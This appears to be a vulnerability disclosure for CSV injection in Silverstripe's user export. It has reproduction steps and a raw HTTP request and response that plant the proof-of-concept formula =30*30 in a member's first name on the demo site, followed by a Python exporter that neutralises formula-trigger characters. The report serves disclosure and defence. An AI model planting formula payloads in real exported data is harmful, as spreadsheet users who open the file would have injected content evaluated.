Description
- The application is vulnerable to CSV Injection in the "Users" functionality: member fields are written to the exported CSV without neutralising values that a spreadsheet interprets as formulas.
CSV Injection #1:
Steps to Reproduce:
- Log in, go to "Security" > "Add Member", and enter the payload =30*30 in the "First Name" field.
- Then go to "Reports" > "Users, Groups and Permissions" > "Export as CSV".
- The payload is evaluated as a formula when the exported CSV file is opened in a spreadsheet application.
// HTTP POST Request
POST /admin/security/users/EditForm/field/users/item/new/ItemEditForm HTTP/1.1
Host: demo.silverstripe.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
[...]
FirstName=%3D30*30&Surname=test&Email=test%40example.com&Password%5B_Password%5D=&Password%5B_ConfirmPassword%5D=&Locale=en_US&FailedLoginCount=&SecurityID=8f151871365766eb90355f98c745a93ae8f5205c&action_doSave=1&BackURL=https%3A%2F%2Fdemo.silverstripe.org%2Fadmin%2Fsecurity
// HTTP Response
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 16 Aug 2025 17:02:00 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 0
Connection: keep-alive
x-status: Saved%20Member%20%22test%2C%20%3D30%2A30%22%20successfully.
x-controllerurl: admin/security/users/EditForm/field/users/item/510
x-pjax: CurrentForm,Breadcrumbs,ValidationResult
x-controller: SilverStripe\Admin\SecurityAdmin
x-title: Silverstripe+-+Security
x-frame-options: SAMEORIGIN
vary: X-Requested-With
[...]
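The fix on the export side is to neutralise formula-like cells before writing the CSV. The following is an added illustration, not Silverstripe's own code: a small exporter that quotes every cell and prefixes values starting with a formula trigger, run over a constructed member list that includes the =30*30 payload from this write-up. The column names and the `export_csv` / `neutralise_cell` helpers are assumptions for the example.

```python
import csv
import io

# Leading characters that Excel and LibreOffice treat as the start of a
# formula, plus tab/CR which can smuggle a formula past a separator.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def is_formula_like(value: str) -> bool:
    """True when a spreadsheet would evaluate this cell instead of showing it."""
    return value.startswith(FORMULA_TRIGGERS)


def neutralise_cell(value) -> str:
    """Prefix formula-like cells with a single quote so they render as text.

    Spreadsheets drop the leading quote on display and show the rest literally.
    Caveat: this also touches legitimate values such as "-5" or a phone number,
    so apply it to free-text columns, not to columns known to be numeric.
    """
    text = "" if value is None else str(value)
    if is_formula_like(text):
        return "'" + text
    return text


def export_csv(rows, columns) -> str:
    """Render rows as RFC 4180 CSV with every cell neutralised and quoted."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writerow(columns)
    for row in rows:
        writer.writerow([neutralise_cell(row.get(col)) for col in columns])
    return buf.getvalue()


# Constructed sample data (hypothetical): the payload from the write-up in
# FirstName next to an ordinary member record.
SAMPLE_MEMBERS = [
    {"FirstName": "=30*30", "Surname": "test", "Email": "test@example.com"},
    {"FirstName": "Alice", "Surname": "Smith", "Email": "alice@example.com"},
]

if __name__ == "__main__":
    print(export_csv(SAMPLE_MEMBERS, ["FirstName", "Surname", "Email"]))
```

The first data row comes out as `"'=30*30","test","test@example.com"`, which a spreadsheet displays as the literal text =30*30 rather than evaluating it.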